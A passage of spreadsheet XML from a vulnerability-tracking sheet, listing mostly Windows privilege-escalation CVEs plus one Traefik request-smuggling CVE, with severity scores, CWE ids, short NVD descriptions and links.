          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3464" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Bluetooth Port Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3464" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69817</t>
        </is>
      </c>
    </row>
    <row r="3465">
      <c r="A3465" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3465" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69818</t>
        </is>
      </c>
      <c r="C3465" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3465" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3465" s="5" t="inlineStr"/>
      <c r="F3465" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3465" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3465" s="5" t="inlineStr"/>
      <c r="I3465" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3465" s="5" t="inlineStr"/>
      <c r="K3465" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3465" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Win32K allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3465" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69818</t>
        </is>
      </c>
    </row>
    <row r="3466">
      <c r="A3466" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3466" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69834</t>
        </is>
      </c>
      <c r="C3466" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3466" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3466" s="5" t="inlineStr"/>
      <c r="F3466" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3466" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3466" s="5" t="inlineStr"/>
      <c r="I3466" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3466" s="5" t="inlineStr"/>
      <c r="K3466" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3466" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows ALPC allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3466" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69834</t>
        </is>
      </c>
    </row>
    <row r="3467">
      <c r="A3467" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3467" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69838</t>
        </is>
      </c>
      <c r="C3467" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3467" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3467" s="5" t="inlineStr"/>
      <c r="F3467" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3467" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3467" s="5" t="inlineStr"/>
      <c r="I3467" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3467" s="5" t="inlineStr"/>
      <c r="K3467" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3467" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Print Spooler Components allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3467" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69838</t>
        </is>
      </c>
    </row>
    <row r="3468">
      <c r="A3468" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3468" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69859</t>
        </is>
      </c>
      <c r="C3468" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3468" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3468" s="5" t="inlineStr"/>
      <c r="F3468" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3468" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3468" s="5" t="inlineStr"/>
      <c r="I3468" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3468" s="5" t="inlineStr"/>
      <c r="K3468" s="5" t="inlineStr">
        <is>
          <t>CWE-191, CWE-367</t>
        </is>
      </c>
      <c r="L3468" s="5" t="inlineStr">
        <is>
          <t>Time-of-ch</t>
        </is>
      </c>
      <c r="M3468" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69859</t>
        </is>
      </c>
    </row>
    <row r="3469">
      <c r="A3469" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3469" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69866</t>
        </is>
      </c>
      <c r="C3469" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3469" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3469" s="5" t="inlineStr"/>
      <c r="F3469" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3469" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3469" s="5" t="inlineStr"/>
      <c r="I3469" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3469" s="5" t="inlineStr"/>
      <c r="K3469" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3469" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Device Association Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3469" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69866</t>
        </is>
      </c>
    </row>
    <row r="3470">
      <c r="A3470" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3470" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69889</t>
        </is>
      </c>
      <c r="C3470" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3470" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3470" s="5" t="inlineStr"/>
      <c r="F3470" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3470" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3470" s="5" t="inlineStr"/>
      <c r="I3470" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3470" s="5" t="inlineStr"/>
      <c r="K3470" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3470" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Bluetooth Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3470" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69889</t>
        </is>
      </c>
    </row>
    <row r="3471">
      <c r="A3471" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3471" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69891</t>
        </is>
      </c>
      <c r="C3471" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3471" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3471" s="5" t="inlineStr"/>
      <c r="F3471" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3471" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3471" s="5" t="inlineStr"/>
      <c r="I3471" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3471" s="5" t="inlineStr"/>
      <c r="K3471" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3471" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Media allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3471" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69891</t>
        </is>
      </c>
    </row>
    <row r="3472">
      <c r="A3472" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3472" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69896</t>
        </is>
      </c>
      <c r="C3472" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3472" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3472" s="5" t="inlineStr"/>
      <c r="F3472" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3472" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3472" s="5" t="inlineStr"/>
      <c r="I3472" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3472" s="5" t="inlineStr"/>
      <c r="K3472" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3472" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Error Reporting allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3472" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69896</t>
        </is>
      </c>
    </row>
    <row r="3473">
      <c r="A3473" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3473" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69911</t>
        </is>
      </c>
      <c r="C3473" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3473" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3473" s="5" t="inlineStr"/>
      <c r="F3473" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3473" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H3473" s="5" t="inlineStr"/>
      <c r="I3473" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3473" s="5" t="inlineStr"/>
      <c r="K3473" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3473" s="5" t="inlineStr">
        <is>
          <t>Use after free in Microsoft Windows Search Component allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3473" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69911</t>
        </is>
      </c>
    </row>
    <row r="3474">
      <c r="A3474" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3474" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70283</t>
        </is>
      </c>
      <c r="C3474" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3474" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3474" s="5" t="inlineStr"/>
      <c r="F3474" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3474" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3474" s="5" t="inlineStr"/>
      <c r="I3474" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3474" s="5" t="inlineStr"/>
      <c r="K3474" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L3474" s="5" t="inlineStr">
        <is>
          <t>Incorrect authorization in Windows Win32K allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3474" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70283</t>
        </is>
      </c>
    </row>
    <row r="3475">
      <c r="A3475" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3475" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70562</t>
        </is>
      </c>
      <c r="C3475" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3475" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3475" s="5" t="inlineStr"/>
      <c r="F3475" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3475" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3475" s="5" t="inlineStr"/>
      <c r="I3475" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3475" s="5" t="inlineStr"/>
      <c r="K3475" s="5" t="inlineStr">
        <is>
          <t>CWE-415</t>
        </is>
      </c>
      <c r="L3475" s="5" t="inlineStr">
        <is>
          <t>Double free in Windows Audio Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3475" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70562</t>
        </is>
      </c>
    </row>
    <row r="3476">
      <c r="A3476" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3476" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70565</t>
        </is>
      </c>
      <c r="C3476" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3476" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3476" s="5" t="inlineStr"/>
      <c r="F3476" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3476" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3476" s="5" t="inlineStr"/>
      <c r="I3476" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3476" s="5" t="inlineStr"/>
      <c r="K3476" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3476" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows AF_UNIX Socket Provider allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3476" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70565</t>
        </is>
      </c>
    </row>
    <row r="3477">
      <c r="A3477" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3477" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70567</t>
        </is>
      </c>
      <c r="C3477" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3477" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3477" s="5" t="inlineStr"/>
      <c r="F3477" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3477" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3477" s="5" t="inlineStr"/>
      <c r="I3477" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3477" s="5" t="inlineStr"/>
      <c r="K3477" s="5" t="inlineStr">
        <is>
          <t>CWE-415</t>
        </is>
      </c>
      <c r="L3477" s="5" t="inlineStr">
        <is>
          <t>Double free in Windows Display Enhancement Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3477" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70567</t>
        </is>
      </c>
    </row>
    <row r="3478">
      <c r="A3478" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3478" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70568</t>
        </is>
      </c>
      <c r="C3478" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3478" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3478" s="5" t="inlineStr"/>
      <c r="F3478" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3478" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3478" s="5" t="inlineStr"/>
      <c r="I3478" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3478" s="5" t="inlineStr"/>
      <c r="K3478" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L3478" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Defender Firewall Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3478" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70568</t>
        </is>
      </c>
    </row>
    <row r="3479">
      <c r="A3479" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3479" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70573</t>
        </is>
      </c>
      <c r="C3479" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3479" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3479" s="5" t="inlineStr"/>
      <c r="F3479" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3479" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3479" s="5" t="inlineStr"/>
      <c r="I3479" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3479" s="5" t="inlineStr"/>
      <c r="K3479" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-20</t>
        </is>
      </c>
      <c r="L3479" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3479" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70573</t>
        </is>
      </c>
    </row>
    <row r="3480">
      <c r="A3480" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3480" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70577</t>
        </is>
      </c>
      <c r="C3480" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3480" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3480" s="5" t="inlineStr"/>
      <c r="F3480" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3480" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3480" s="5" t="inlineStr"/>
      <c r="I3480" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3480" s="5" t="inlineStr"/>
      <c r="K3480" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3480" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Modern Device Management (MDM) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3480" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70577</t>
        </is>
      </c>
    </row>
    <row r="3481">
      <c r="A3481" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3481" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70578</t>
        </is>
      </c>
      <c r="C3481" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3481" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3481" s="5" t="inlineStr"/>
      <c r="F3481" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3481" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3481" s="5" t="inlineStr"/>
      <c r="I3481" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3481" s="5" t="inlineStr"/>
      <c r="K3481" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L3481" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Credential Guard allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3481" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70578</t>
        </is>
      </c>
    </row>
    <row r="3482">
      <c r="A3482" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3482" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70585</t>
        </is>
      </c>
      <c r="C3482" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3482" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3482" s="5" t="inlineStr"/>
      <c r="F3482" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3482" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3482" s="5" t="inlineStr"/>
      <c r="I3482" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3482" s="5" t="inlineStr"/>
      <c r="K3482" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3482" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Services for NFS ONCRPC XDR Driver allows an authorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="M3482" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70585</t>
        </is>
      </c>
    </row>
    <row r="3483">
      <c r="A3483" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3483" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71324</t>
        </is>
      </c>
      <c r="C3483" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3483" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3483" s="5" t="inlineStr"/>
      <c r="F3483" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G3483" s="5" t="inlineStr"/>
      <c r="H3483" s="5" t="inlineStr"/>
      <c r="I3483" s="5" t="inlineStr">
        <is>
          <t>2026-08-06</t>
        </is>
      </c>
      <c r="J3483" s="5" t="inlineStr"/>
      <c r="K3483" s="5" t="inlineStr">
        <is>
          <t>CWE-444</t>
        </is>
      </c>
      <c r="L3483" s="5" t="inlineStr">
        <is>
          <t>Traefik is an open source HTTP reverse proxy and load balancer. Prior to 2.11.53, 3.6.24, and 3.7.9, Traefik's default HTTP reverse proxy forwards a plain HTTP/2 or HTTP/3 CONNECT request and its body to an HTTP/1.1 upstream through a shared net/http.Transport. When the upstream answers the CONNECT with a keep-alive non-2xx response and does not drain the body, Traefik returns the desynchronized backend socket to its shared pool and reuses it for other clients. An unauthenticated attacker can use this behavior to make a different client read the attacker's smuggled response, which can include authenticated or private content from another request. The ForwardAuth middleware with forwardBody true and preserveRequestMethod true can re-issue a CONNECT with the buffered body attached, exposing the auth-client pool to the same desynchronization. This issue is fixed in 2.11.53, 3.6.24, and 3.7.9.</t>
        </is>
      </c>
      <c r="M3483" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71324</t>
        </is>
      </c>
    </row>
    <row r="3484">
      <c r="A3484" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3484" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71332</t>
        </is>
      </c>
      <c r="C3484" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3484" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3484" s="5" t="inlineStr"/>
      <c r="F3484" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3484" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3484" s="5" t="inlineStr"/>
      <c r="I3484" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3484" s="5" t="inlineStr"/>
      <c r="K3484" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3484" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Secure Socket Tunneling Protocol (SSTP) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3484" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71332</t>
        </is>
      </c>
    </row>
    <row r="3485">
      <c r="A3485" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3485" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71333</t>
        </is>
      </c>
      <c r="C3485" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3485" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3485" s="5" t="inlineStr"/>
      <c r="F3485" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3485" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3485" s="5" t="inlineStr"/>
      <c r="I3485" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3485" s="5" t="inlineStr"/>
      <c r="K3485" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3485" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Remote Access Connection Manager allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3485" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71333</t>
        </is>
      </c>
    </row>
    <row r="3486">
      <c r="A3486" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3486" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71340</t>
        </is>
      </c>
      <c r="C3486" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3486" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3486" s="5" t="inlineStr"/>
      <c r="F3486" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3486" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3486" s="5" t="inlineStr"/>
      <c r="I3486" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3486" s="5" t="inlineStr"/>
      <c r="K3486" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3486" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows File History Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3486" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71340</t>
        </is>
      </c>
    </row>
    <row r="3487">
      <c r="A3487" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3487" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71342</t>
        </is>
      </c>
      <c r="C3487" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3487" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3487" s="5" t="inlineStr"/>
      <c r="F3487" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3487" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3487" s="5" t="inlineStr"/>
      <c r="I3487" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3487" s="5" t="inlineStr"/>
      <c r="K3487" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3487" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Remote Access Connection Manager allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3487" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71342</t>
        </is>
      </c>
    </row>
    <row r="3488">
      <c r="A3488" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3488" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71351</t>
        </is>
      </c>
      <c r="C3488" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3488" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3488" s="5" t="inlineStr"/>
      <c r="F3488" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3488" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3488" s="5" t="inlineStr"/>
      <c r="I3488" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3488" s="5" t="inlineStr"/>
      <c r="K3488" s="5" t="inlineStr">
        <is>
          <t>CWE-415</t>
        </is>
      </c>
      <c r="L3488" s="5" t="inlineStr">
        <is>
          <t>Double free in Windows Routing and Remote Access Service (RRAS) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
